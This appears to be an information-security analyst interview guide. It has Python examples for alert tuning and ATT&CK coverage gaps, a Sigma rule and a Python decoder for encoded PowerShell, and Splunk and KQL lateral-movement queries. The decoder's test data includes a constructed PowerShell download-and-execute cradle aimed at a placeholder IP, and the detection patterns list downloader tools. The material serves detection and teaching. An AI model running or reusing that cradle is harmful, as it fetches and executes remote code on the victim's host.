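The alert-volume question above ('1,000 alerts per day, capacity for 50') and the detection coverage gap topic from the frameworks round, worked together as one added Python example that is not from the guide. Given a rule inventory tagged with ATT&CK techniques and 30 days of analyst dispositions, it computes the current daily load, ranks the rules that burn the most analyst time per true positive (the ones to tune first), estimates the load after tuning them, and lists the tactics no rule covers at all, which is the other half of the answer: reducing noise must not be done by deleting the only coverage a tactic has. Rule names, counts and the target tactic list are constructed; the precision threshold and the assumed false-positive reduction are assumptions.

```python
# Constructed 30-day disposition counts per rule: (ATT&CK technique, tactic, alerts raised, confirmed true positives).
RULES = {
    "PS-EncodedCommand":     ("T1059.001", "execution",           900,   12),
    "Brute-Force-Login":     ("T1110",     "credential-access",   18000, 30),
    "New-Admin-Added":       ("T1098",     "persistence",         40,    8),
    "DNS-Long-Label":        ("T1071.004", "command-and-control", 6000,  2),
    "Scheduled-Task-Create": ("T1053.005", "persistence",         1500,  5),
    "Phishing-Link-Click":   ("T1566.002", "initial-access",      3500,  60),
}

# Constructed list of tactics the team wants at least one rule for (a subset of ATT&CK Enterprise tactics).
TARGET_TACTICS = ["initial-access", "execution", "persistence", "privilege-escalation", "defense-evasion",
                  "credential-access", "discovery", "lateral-movement", "collection", "command-and-control",
                  "exfiltration", "impact"]


def daily_alert_load(rules, days=30):
    """Average alerts per day across the inventory."""
    return sum(r[2] for r in rules.values()) / days


def rule_stats(rules):
    """Per-rule precision and noise figures an analyst lead would put on a dashboard."""
    rows = []
    for name, (technique, tactic, alerts, tps) in rules.items():
        fps = alerts - tps
        rows.append({"rule": name, "technique": technique, "tactic": tactic, "alerts": alerts,
                     "true_positives": tps, "false_positives": fps,
                     "precision": tps / alerts if alerts else 0.0,
                     "fp_per_tp": fps / tps if tps else float("inf")})
    return rows


def tuning_candidates(rules, min_precision=0.02):
    """Rules below the precision floor, worst first by absolute false-positive count."""
    rows = [r for r in rule_stats(rules) if r["precision"] < min_precision]
    return sorted(rows, key=lambda r: r["false_positives"], reverse=True)


def projected_load(rules, tuned, reduction=0.9, days=30):
    """Alerts per day if each rule in `tuned` loses `reduction` of its false positives and keeps its true positives."""
    total = 0.0
    for name, (_, _, alerts, tps) in rules.items():
        fps = alerts - tps
        if name in tuned:
            fps *= (1 - reduction)
        total += tps + fps
    return total / days


def coverage_gaps(rules, target_tactics):
    """Tactics with no rule at all: noise reduction must not remove a tactic's only coverage."""
    covered = {r[1] for r in rules.values()}
    return [t for t in target_tactics if t not in covered]


def sole_coverage(rules):
    """Rules that are the only coverage for their tactic; tune these carefully, never just disable them."""
    by_tactic = {}
    for name, (_, tactic, _, _) in rules.items():
        by_tactic.setdefault(tactic, []).append(name)
    return sorted(names[0] for names in by_tactic.values() if len(names) == 1)


if __name__ == "__main__":
    print(f"current load: {daily_alert_load(RULES):.0f} alerts/day")
    worst = [r["rule"] for r in tuning_candidates(RULES)[:2]]
    print("tune first:", worst)
    print(f"after tuning: {projected_load(RULES, set(worst)):.0f} alerts/day")
    print("uncovered tactics:", coverage_gaps(RULES, TARGET_TACTICS))
    print("sole coverage:", sole_coverage(RULES))
```

On the constructed numbers the inventory produces 998 alerts a day, and tuning just the two worst rules (Brute-Force-Login and DNS-Long-Label) brings the projected load under 280, without touching the rules that carry real signal. "Tuning" here means adding context the rule lacks (for brute force: N failures followed by a success from the same source; for DNS: excluding known CDN and telemetry domains), not raising thresholds until the alert stops firing. Seven of the twelve target tactics have no rule at all, which is the gap list you would bring to the detection engineering backlog.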
Hiring Manager Round: Role Expectations and Team Fit
What to Expect
This final 45-60 minute conversation is typically with your direct manager or team lead. The primary goals are to assess your understanding of the role, your expectations, and mutual fit. The hiring manager will discuss day-to-day responsibilities, team dynamics, growth opportunities, and your motivation for the role. This is also your opportunity to ask detailed questions about the team, security challenges, tooling, and career development. The interviewer is assessing: Do you understand what the job entails? Are you genuinely excited about it? Will you work well with the team? For junior level, the emphasis is on learning potential, eagerness to contribute, and compatibility with team culture. The hiring manager is also starting to think about how to mentor you and what your first 90 days would look like.
Tips & Advice
Prepare thoughtful questions about the team's security priorities, current incidents or challenges, how success is measured for this role, and what the first 90 days look like. Show genuine interest in the team's work and ask about mentoring/growth opportunities. Be honest about your skill level and express eagerness to learn from experienced team members. Listen carefully to how the hiring manager describes team dynamics—this is often where you learn whether it's a collaborative, supportive environment. For a junior role, emphasizing that you're looking to build expertise and contribute to the team's security posture resonates well. Ask about on-call expectations, incident response procedures, and typical week-to-week work. This is your best opportunity to ensure you're making a good decision about joining the team, so ask clarifying questions about anything important to you.
Frequently Asked Information Security Analyst Interview Questions
Sample answer (Sigma rule over process-creation telemetry):

title: Detect PowerShell EncodedCommand with Download Utilities
id: f3b8d9a2-xxxx-xxxx-xxxx-xxxxxxxxxxxx
status: experimental
description: Detects PowerShell launched with an encoded command (-EncodedCommand or one of its accepted short forms such as -enc or -e) carrying a long base64 token, or a plain command line that combines a long base64-like token with a download utility such as bitsadmin, certutil, curl, wget, Invoke-WebRequest or Net.WebClient. Reduces false positives by requiring long encoded content and excluding known management parent processes.
author: InfoSec Analyst
references: []
tags:
    - attack.execution
    - attack.t1059.001
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
    definition: 'Sysmon EventID 1 or Security 4688 with command-line logging enabled'
detection:
    selection_powershell:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_encoded_flag:
        # PowerShell accepts any unambiguous prefix of -EncodedCommand; the common ones are listed here
        CommandLine|re: '(?i)\s-e(c|nc?|ncodedcommand)?\s'
    selection_long_base64:
        CommandLine|re: '[A-Za-z0-9+/]{100,}={0,2}'   # long base64-like token
    selection_downloader:
        CommandLine|re: '(?i)\b(bitsadmin|certutil|wget|curl|iwr|irm|Invoke-WebRequest|Invoke-RestMethod|WebClient|Start-BitsTransfer)\b'
    filter_management_parents:
        ParentImage|endswith:
            - '\ccmexec.exe'                # SCCM client
            - '\MonitoringHost.exe'         # SCOM agent
            - '\enterprise_mgmt_tool.exe'   # placeholder: replace with your own management tooling
    condition: selection_powershell and selection_long_base64 and (selection_encoded_flag or selection_downloader) and not filter_management_parents
fields:
    - Image
    - CommandLine
    - ParentImage
    - User
    - ComputerName
falsepositives:
    - Large internal automation scripts that legitimately use encoded payloads; tune by adding known parent process or user exclusions.
level: high
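To complement the Sigma rule above, an added Python example (not part of the original page) that does the step the rule cannot: it takes process command lines, finds the -EncodedCommand argument in any of its accepted spellings, base64-decodes it as the UTF-16LE text PowerShell expects, and reports which decoded scripts reference download utilities, so the analyst triaging the alert sees the script instead of a wall of base64. The command lines are constructed for the example (the encoded payloads are built in the block itself), and the downloader keyword list is the same illustrative set the rule uses.

```python
import base64
import re


def encode_ps(script):
    """Encode a script the way 'powershell -EncodedCommand' expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed scripts and command lines (Sysmon EventID 1 style); not real malware.
BENIGN = "Get-Service -Name Spooler | Select-Object Status"
DOWNLOADER = "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://198.51.100.20/a.ps1')"
SAMPLE_COMMANDLINES = [
    f"powershell.exe -NoP -W Hidden -enc {encode_ps(DOWNLOADER)}",
    f"powershell.exe -ExecutionPolicy Bypass -EncodedCommand {encode_ps(BENIGN)}",
    'powershell.exe -Command "Invoke-WebRequest http://203.0.113.5/x.zip -OutFile x.zip"',
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

DOWNLOAD_RE = re.compile(
    r"(?i)\b(bitsadmin|certutil|wget|curl|iwr|irm|Invoke-WebRequest|Invoke-RestMethod|"
    r"WebClient|DownloadString|DownloadFile|Start-BitsTransfer)\b")


def find_encoded(cmdline):
    """Return the token following -EncodedCommand (or -e, -ec, -en, -enc, ...), or None.

    PowerShell resolves any unambiguous prefix of a parameter name, which is why -ExecutionPolicy
    must not be mistaken for it: only prefixes of 'encodedcommand' starting with 'en', plus -e/-ec, count."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith("-") or len(tok) < 2:
            continue
        name = tok[1:].lower()
        if name in ("e", "ec") or (name.startswith("en") and "encodedcommand".startswith(name)):
            return tokens[i + 1]
    return None


def decode_encoded(b64):
    """Decode an -EncodedCommand payload; None if it is not valid base64 or not UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_commandline(cmdline):
    """Decode if encoded, then search the effective script text for download primitives."""
    payload = find_encoded(cmdline)
    decoded = decode_encoded(payload) if payload else None
    effective = decoded if decoded is not None else cmdline
    hits = sorted({m.group(1).lower() for m in DOWNLOAD_RE.finditer(effective)})
    return {
        "encoded": payload is not None,
        "decoded": decoded,
        "downloader_hits": hits,
        "verdict": "investigate" if hits else "likely benign",
    }


def triage_all(cmdlines):
    return [triage_commandline(c) for c in cmdlines]


if __name__ == "__main__":
    for cmd, result in zip(SAMPLE_COMMANDLINES, triage_all(SAMPLE_COMMANDLINES)):
        print(result["verdict"], "|", result["downloader_hits"], "|", (result["decoded"] or cmd)[:80])
```

The second command line is encoded but decodes to a harmless service query; a rule keyed only on the -enc flag would escalate it, while the decoder lets you close it with the decoded text attached to the ticket. Real payloads are often further wrapped (Compress/FromBase64String inside the decoded script), so treat a decoded script that itself contains a long base64 token as another layer to peel.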
Sample answer (Splunk SPL): a network or RDP logon (4624, logon type 3 or 10) followed within 10 minutes by an outbound SMB (port 445) connection from the same host to a different host, a simple check for a lateral-movement hop. Field names follow the Splunk Windows and Sysmon add-ons; the 5156 (Filtering Platform) branch assumes the same DestinationIp/DestinationPort extraction as Sysmon EventCode 3 and must be adjusted to whatever your add-on produces.

(index=winevent EventCode=4624 Logon_Type IN (3,10))
| eval src_ip=coalesce(Source_Network_Address, IpAddress), auth_time=_time
| rename TargetUserName as user
| table host user src_ip auth_time Logon_Type
| join type=left max=0 host
    [ search (index=sysmon EventCode=3 DestinationPort=445) OR (index=winevent EventCode=5156 DestinationPort=445)
      | eval dst_ip=DestinationIp, dst_port=DestinationPort, conn_time=_time
      | table host dst_ip dst_port conn_time Image ]
| where conn_time >= auth_time AND conn_time <= auth_time + 600
| where dst_ip!=src_ip AND NOT cidrmatch("127.0.0.0/8", dst_ip)
| stats earliest(auth_time) as first_auth, earliest(conn_time) as first_smb by host user src_ip dst_ip Image

The join is the simplest way to express this; it is limited by subsearch result and time limits, so for a scheduled detection over all hosts a single search across both sourcetypes summarized with stats by host scales better.

Sample answer (Microsoft Sentinel KQL), the same logic: SecurityEvent holds the 4624 logons; the connection side here comes from DeviceNetworkEvents (Defender for Endpoint), standing in for the original's Syslog/CommonSecurityLog placeholder, which do not carry per-host destination-port fields. Hostnames are lower-cased so the two tables join; strip the domain suffix as well if one source logs short names.

let auth = SecurityEvent
    | where EventID == 4624 and LogonType in (3, 10)
    | extend src_ip = tostring(IpAddress), host = tolower(Computer), user = Account, auth_time = TimeGenerated
    | project auth_time, host, user, src_ip;
let smb = DeviceNetworkEvents   // swap for your connection telemetry (e.g. Sysmon EID 3 via the Event table)
    | where RemotePort == 445 and ActionType == "ConnectionSuccess"
    | extend dst_ip = tostring(RemoteIP), host = tolower(DeviceName), conn_time = TimeGenerated, ProcessName = InitiatingProcessFileName
    | project conn_time, host, dst_ip, ProcessName;
auth
| join kind=inner smb on host
| where conn_time between (auth_time .. (auth_time + 10m))
    and dst_ip != src_ip
    and not(ipv4_is_in_range(dst_ip, "127.0.0.0/8"))
| summarize first_auth = min(auth_time), first_smb = min(conn_time) by host, user, src_ip, dst_ip, ProcessName